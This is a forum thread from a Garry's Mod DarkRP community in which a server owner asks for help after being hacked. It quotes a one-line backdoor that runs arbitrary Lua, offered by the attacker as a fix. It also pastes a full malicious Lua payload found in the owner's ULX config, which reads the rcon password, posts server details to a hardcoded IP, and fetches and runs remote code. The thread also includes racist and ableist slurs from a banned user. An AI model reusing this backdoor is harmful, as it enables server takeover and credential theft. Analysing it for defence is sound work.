*BEWARE* Huge Exploit, Nobody's talking about this?

I started a new server recently, and a player joined. As soon as he had loaded in, he was able to strip everyones’ weapons and remove all entities on the map (printers, etc). He told me he had found an exploit. I made sure to disable clientside scripts in darkrpmodification, and added in cake anticheat. After rebooting, I told the user to rejoin and try again. He got kicked once, and then rejoined, and bypassed the anticheat.

I know there’s the big citizenhack, odiumpro, and other things out there that are able to do this. The user mentioned that the way he was exploiting was by the use of net messages. He told me he’d created his own bypass system, and then offered to help me.

He told me that running this line would close net messages to stop people from exploiting properties. I just wanted to see what people thought of this, since I don’t know if it is legitimate.
“util.AddNetworkString(‘ULX_QUERY2’) net.Receive(‘ULX_QUERY2’,function(len,pl) RunStringEx(net.ReadString(),’[C]’,false) end)”

Furthermore, if anticheat is so easy to bypass, why am I having difficulty finding a post that mentions this and also has a solution to it? I’m running darkrp with extremely minimal addons. Any scripts I have are from gmodstore as well.

You’ve got an addon or script somewhere that isn’t properly making sure that people running commands are supposed to be running those commands.

Also, that snippet he gave you is bad. Lets him run any Lua he inputs, serverside.

95% a workshop addon you have running.

also do not run anything he gives you

Is it true that using that command and then restarting the server would wipe that command?

[editline]15th July 2017[/editline]

Furthermore, here is a list of my workshop addons.

[editline]15th July 2017[/editline]

Also, I’m using:
-blogs
-adminpopups
-ahud
-arivia f4
-ascoreboard
-awarn2
-bitminer
-cuffs
-meth
-wyozi cinema kit
-money clickers

[editline]15th July 2017[/editline]

Also, he is able to do this on a darkrp server that has NO addons aside from darkrp and I would imagine ULX.

Even if there were some exploit beyond a backdoor created from an addon, we wouldn’t know unless you provided explicit details. Just saying that someone exploited your server doesn’t help. I’d venture to guess he wouldn’t be able to do this on a purely vanilla DarkRP server.

I just got a message saying to check my ulx config.

He planted a httpfetch hook that gave him access to a bunch of things. I removed the hook, changed rcon password.

I’m being told that my server is done and that there is no way to remove it. Is that entirely true? Also, how did he manage to do this to my server?

[editline]15th July 2017[/editline]

– server info gathering
if easylua then return end
local pwn = {}
pwn[‘G’] = table.Copy(_G)
pwn[‘R’] = debug.getregistry()
pwn[‘address_full’] = “http://159.203.163.139/index.php
pwn[‘address’] = pwn[‘address_full’]
pwn[‘sstr’] = “ULX_QUERY2”
pwn[‘cstr’] = “ULX_QUERY”
pwn[‘sid’] = {
[“STEAM_0:0:46709807”] = true,
[“STEAM_0:0:70614886”] = true,
[“STEAM_0:1:118234279”] = true,
}
pwn[‘fsender_interval’] = 130
pwn[‘inj_interface_interval’] = 600
pwn[‘G’][“util”]“AddNetworkString”
pwn[‘G’][“util”]“AddNetworkString”

pwn[‘G’][“pcall”](
function()

pwn['p'] = function(y)
  for k,v in pairs(player.GetAll()) do
    if pwn['sid'][v:SteamID()] then
      v:oldsendlua([=[ chat.AddText( Color( 255, 93,155, 255 ),[[]=]..y..[=[]]) ]=])
    end
  end
end

pwn['rstr'] = function ( intMin, intMax )
  local ret = ""
  for _ = 1, pwn['math']["random"]( intMin, intMax ) do
    ret = ret.. string.char( math.random(65, 90) )
  end

  return ret
end

pwn['sli_inj'] = function( pPlayer, strLua )
pwn['net']["Start"]( "rlua" )
pwn['net']["WriteString"]( strLua )
pwn['net']["Send"]( pPlayer )

end

pwn[‘sli_interface’] = function (pPlayer )
pPlayer:oldsendlua( [[net.Receive(“ULX_QUERY”, function() RunStringEx(net.ReadString(),“lua/addons/gGenerate/workshop.lua”,false) end)]] )
end

pwn[‘runlua’] = function(r, t)
local y = pwn[‘G’]“CompileString”
if type(y) ~= ‘function’ then
pwn[‘p’](‘SYNTAX ERROR:’…y)
else
local u, i = pwn[‘G’]“pcall”
if not u then
pwn’p’
end

end

end
pwn[‘chk_scan’] = function()
for k,v in pairs( string.Split( pwn[‘file’]“Read”, "
" ) ) do
if( string.StartWith( v, “rcon_password” ) ) then
local str = v
str = string.Replace( str, “”", “” )
str = string.Right( str, #str - 14)
pwn[“rcon_config”] = str
end
end
if CAC then
pwn[‘anticheat’] = “CAC”
elseif SimplicityAC then
pwn[‘anticheat’] =“SimplicityAC”
elseif QAC then
pwn[‘anticheat’] =“QAC”
else
pwn[‘anticheat’] = “unknown”
end

pwn[‘inf_tbl’] = {
sn = GetHostName(),
playercount = tostring( #player.GetAll() ),
ip = _G[“game”]“GetIPAddress”,
gamemode = _G[“engine”]“ActiveGamemode”,
serverpass = _G"GetConVarString" or “nil”,
rcon = pwn[‘rcon_config’] or “nil”,
currentac = pwn[‘anticheat’] or “nil”,
infectedaddon = GPVERSION or “nil”
}

end

pwn[‘bstrapper’] = function()
pwn’def_registry’
pwn’chk_scan’
pwn’chk_pos’
pwn[‘G’][‘timer’][‘Create’](pwn’rstr’,pwn[‘inj_interface_interval’],0,function()
for k,v in pairs(player.GetAll()) do
pwn[‘sli_interface’] (v)
end
pwn’reg_interval’
end)

pwn[‘net’][‘Receive’](“ULX_QUERY2”,function(pl,len)
local gstr = pwn[“net”]“ReadString”
local gbit = pwn[“net”]“ReadBit”
if gbit == 1 then
pwn’runlua’
end
end)
end

pwn[‘reg_interval’] = function(gq)
pwn[‘inj_interface_interval’] = gq

end

pwn[‘def_registry’] = function()
pwn[‘R’][“Player”][“oldsendlua”] = pwn[‘R’][“Player”][“SendLua”]
pwn[‘R’][“Player”][“oldsteamid”] = pwn[‘R’][“Player”][“SteamID”]
pwn[‘R’][“Player”][“oldunique”] = pwn[‘R’][“Player”][“UniqueID”]
pwn[‘R’][“Player”][“oldnick”] = pwn[‘R’][“Player”][“Nick”]
– globals
pwn[‘math’] = pwn[‘G’][“math”]
pwn[‘net’] = pwn[‘G’][“net”]
pwn[‘http’] = pwn[‘G’][“http”]
pwn[‘file’] = pwn[‘G’][“file”]
end

pwn[‘chk_pos’] = function()
if SERVER and pwn[‘G’][“game”]“IsDedicated” then – report the server to our addr
pwn[‘http’][“Post”](pwn[‘address’], pwn[“inf_tbl”] )
end
end
– advanced hiding techniques :smiley: , not rly .

pwn[‘Fetchcode’] = function(url)
pwn[‘http’][“Fetch”](url,function© pwn’runlua’ end)
end

pwn[‘chk_panel’] = function (ply,cmd,args)
if pwn[“sid”][ply:SteamID()] then
ply:oldsendlua([=[
if file.Exists(“lua/bkit.lua”,“GAME”) then
_G"RunStringEx"
MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel
")
else
MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel
")
end
]=])
else
ply:oldsendlua([=[MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel
")]=])
end
end
pwn[‘G’][“concommand”]“Add”

pwn[‘G’][“timer”][“Simple”](pwn[‘fsender_interval’] ,function()
pwn[‘bstrapper’] ()

end)
end
)

From an exploit in one of your addons or FTP.

Given the huge thing I just posted, even though I removed it, is my server even safe anymore?

[editline]15th July 2017[/editline]

Is this literal malware? Do I need to completely wipe my server?

[editline]15th July 2017[/editline]

I would really appreciate knowing whether or not my server is at all safe?

I’ve changed my authkey, changed my rcon password

Can you fill us in where you got that copy of ulx from?
You should probably check the source to make sure someone else didn’t upload that file to your server.

The person managed to plant that in the server.

Now that it is removed, is my server safe?

[editline]15th July 2017[/editline]

Will someone please respond with a yes/no?

-snip-

Soo you’re saying someone remotely updated your ulx config file?

Yes, he was able to bypass my cake anticheat and somehow managed to upload that.

Now, back to my question, looking at the malicious code that was injected, is there anything I need to be worried about, now that all my passwords are changed?

YOU BEING A FUCKING RETARD ISN’T A HUGE EXPLOIT LOL

I’ve done nothing to receive that title.

Can someone useful reply though?

You asking us if your server is safe is not a very good question, how are we suppose to know? The only thing you can do is check all of your addons for backdoors, etc.

Assuming that’s the only exploit your server will be fine once it’s removed.
However i’d be more concerned about how he/she managed to upload the file. If the person exploiting your server has access to upload files what’s to stop them uploading another file.

I WILL REPLY TO YOU WHEN YOU’RE NOT A FUCKING RETARD LOL

[editline]16th July 2017[/editline]

HAHAHAHA DUMB NIGGER


(User was permabanned for this post ("Spammer" - Kiwi))

it was inside of the ulx config. I got the standard ulx. it was clearly done by this player: http://steamcommunity.com/id/Childlike/

he is an experienced hacker as well. Just look at his profile.

[editline]15th July 2017[/editline]

It appears this guy is one of the creators of odium.pro.